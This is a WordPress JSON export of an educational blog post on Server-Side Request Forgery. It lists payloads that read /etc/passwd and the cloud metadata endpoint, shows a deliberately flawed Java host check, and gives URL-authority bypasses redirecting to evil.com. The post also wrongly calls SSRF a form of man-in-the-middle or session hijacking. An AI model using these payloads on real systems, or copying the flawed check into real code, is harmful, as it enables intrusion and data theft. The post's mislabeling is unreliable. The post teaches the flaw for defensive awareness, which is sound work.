{"id":10831,"date":"2024-01-25T19:58:38","date_gmt":"2024-01-25T19:58:38","guid":{"rendered":"https:\/\/temperies.com\/?p=10831"},"modified":"2024-01-26T12:51:35","modified_gmt":"2024-01-26T12:51:35","slug":"server-side-request-forgery-2","status":"publish","type":"post","link":"https:\/\/temperies.com\/es\/2024\/01\/25\/server-side-request-forgery-2\/","title":{"rendered":"Server-Side Request Forgery"},"content":{"rendered":"<p class=\"has-large-font-size\">Server-Side Request Forgery<\/p>\n\n\n\n<p class=\"is-style-plain\">This attack vector exploits vulnerabilities in server communication by manipulating network connections established by the application server. This manipulation, known as man-in-the-middle (MITM) or session hijacking, allows attackers to:<\/p>\n\n\n\n<ul><li><strong>Redirect server requests:<\/strong>&nbsp;Instead of reaching their intended destination,&nbsp;requests get rerouted to malicious actors who can intercept and alter data.<\/li><li><strong>Port scan internal servers:<\/strong>&nbsp;By analyzing traffic flow,&nbsp;attackers can identify and map internal servers,&nbsp;increasing their attack surface.<\/li><li><strong>Expose sensitive data:<\/strong>&nbsp;Intercepted requests or responses might contain confidential information like user credentials or financial data.<\/li><li><strong>Access cloud service metadata:<\/strong>&nbsp;Attackers can potentially exploit leaked metadata to gain unauthorized access to cloud storage and databases.<\/li><li><strong>Compromise internal services:<\/strong>&nbsp;Once inside the network,&nbsp;attackers can infiltrate and exploit internal services,&nbsp;causing critical disruptions.<\/li><\/ul>\n\n\n\n<p class=\"has-large-font-size\">SSRF versus Infrastructure<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" width=\"1696\" height=\"776\" src=\"https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image.png\" alt=\"\" class=\"wp-image-10835\" 
srcset=\"https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image.png 1696w, https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image-768x351.png 768w, https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image-1536x703.png 1536w, https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image-18x8.png 18w\" sizes=\"(max-width: 1696px) 100vw, 1696px\" \/><\/figure>\n\n\n\n<p>Below you can see the vulnerability examples.<\/p>\n\n\n\n<p><strong>Affected Endpoint:<\/strong><\/p>\n\n\n\n<p>https:\/\/victim.com\/api\/v1\/ui\/getresource?rid=https:\/\/internal.victim.com\/storage\/logo.png<\/p>\n\n\n\n<p><strong>Payloads:<\/strong><\/p>\n\n\n\n<ul><li>file:\/\/\/etc\/passwd<\/li><li>http:\/\/localhost:8080\/<\/li><li>https:\/\/internal.victim.com:3306\/<\/li><li>http:\/\/169.254.169.254\/metadata\/v1.json<\/li><li>https:\/\/kubernetes.default.svc\/metrics<\/li><li>ftp:\/\/internal.victim.com<\/li><\/ul>\n\n\n\n<p><strong>Affected Endpoint (weak host validation):<\/strong><\/p>\n\n\n\n<p>https:\/\/victim.com\/api\/v1\/ui\/getresource?rid=storage\/logo.png<\/p>\n\n\n\n<p><strong>Sample code:<\/strong><\/p>\n\n\n\n<pre><code>String baseUrl = \"http:\/\/internal.victim.com\";\nString resource = String.format(\"%s\/%s\", baseUrl, rid);\n\/\/ Weak host validation: startsWith() only checks the string prefix,\n\/\/ so a user-controlled rid can still rewrite the URL authority (see the payloads below).\nif (resource.startsWith(baseUrl)) {\n  HttpResponse response = (new HttpClient()).target(resource).get();\n  return (response.getStatus() == 200)\n      ? response.getStream()\n      : response.getErrorMessage();\n}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img width=\"1292\" height=\"454\" src=\"https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image-1.png\" alt=\"\" class=\"wp-image-10836\" srcset=\"https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image-1.png 1292w, https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image-1-768x270.png 768w, https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image-1-18x6.png 18w\" sizes=\"(max-width: 1292px) 100vw, 1292px\" \/><\/figure>\n\n\n\n<p><strong>Authority composition<\/strong><\/p>\n\n\n\n<ul><li>example.com<\/li><li>example.com:8080<\/li><li>user@example.com<\/li><li>user:passwd@example.com<\/li><li>user:passwd@example.com:443<\/li><\/ul>\n\n\n\n<p><strong>Back in business<\/strong><\/p>\n\n\n\n<p><strong>Affected Endpoint (weak host validation):<\/strong><\/p>\n\n\n\n<p>https:\/\/victim.com\/api\/v1\/ui\/getresource?rid=storage\/logo.png<\/p>\n\n\n\n<p><strong>Payloads:<\/strong><\/p>\n\n\n\n<ul><li>\/storage\/logo.png<\/li><li>@evil.com\/storage\/logo.png<\/li><li>@evil.com:443\/storage\/logo.png<\/li><li>@evil.com:443#\/storage\/logo.png<\/li><li>:dummy@evil.com:443#\/storage\/logo.png<\/li><li>http:\/\/internal.victim.com:dummy@<strong>evil.com:443<\/strong>#\/storage\/logo.png<\/li><\/ul>\n\n\n\n<p>Sources:<\/p>\n\n\n\n<ul><li><a rel=\"noreferrer noopener\" href=\"https:\/\/vulncat.fortify.com\/en\/detail?id=desc.dataflow.apex.server_side_request_forgery#Java%2FJSP\" target=\"_blank\">https:\/\/vulncat.fortify.com\/en\/detail?id=desc.dataflow.apex.server_side_request_forgery#Java%2FJSP<\/a><\/li><li><a rel=\"noreferrer noopener\" href=\"https:\/\/owasp.org\/Top10\/A10_2021-Server-Side_Request_Forgery_(SSRF)\/\" target=\"_blank\">https:\/\/owasp.org\/Top10\/A10_2021-Server-Side_Request_Forgery_(SSRF)\/<\/a><\/li><li><a rel=\"noreferrer noopener\" 
href=\"https:\/\/www.blackhat.com\/docs\/us-17\/thursday\/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf\" target=\"_blank\">https:\/\/www.blackhat.com\/docs\/us-17\/thursday\/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf<\/a><\/li><li><a rel=\"noreferrer noopener\" href=\"https:\/\/knowledge-base.secureflag.com\/vulnerabilities\/server_side_request_forgery\/server_side_request_forgery_java.html\" target=\"_blank\">https:\/\/knowledge-base.secureflag.com\/vulnerabilities\/server_side_request_forgery\/server_side_request_forgery_java.html<\/a><\/li><li><a rel=\"noreferrer noopener\" href=\"https:\/\/docs.fluidattacks.com\/criteria\/fixes\/java\/100\/\" target=\"_blank\">https:\/\/docs.fluidattacks.com\/criteria\/fixes\/java\/100\/<\/a><\/li><\/ul>","protected":false},"excerpt":{"rendered":"<p>Server-Side Request Forgery This attack vector exploits vulnerabilities in server communication by manipulating network connections established by the application server. This manipulation, known as man-in-the-middle (MITM) or session hijacking, allows attackers to: Redirect server requests:&nbsp;Instead of reaching their intended destination,&nbsp;requests get rerouted to malicious actors who can intercept and alter data. 
Port scan internal servers:&nbsp;By&hellip;<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[49],"tags":[50,53,51,52],"_links":{"self":[{"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/posts\/10831"}],"collection":[{"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/comments?post=10831"}],"version-history":[{"count":6,"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/posts\/10831\/revisions"}],"predecessor-version":[{"id":10840,"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/posts\/10831\/revisions\/10840"}],"wp:attachment":[{"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/media?parent=10831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/categories?post=10831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/tags?post=10831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}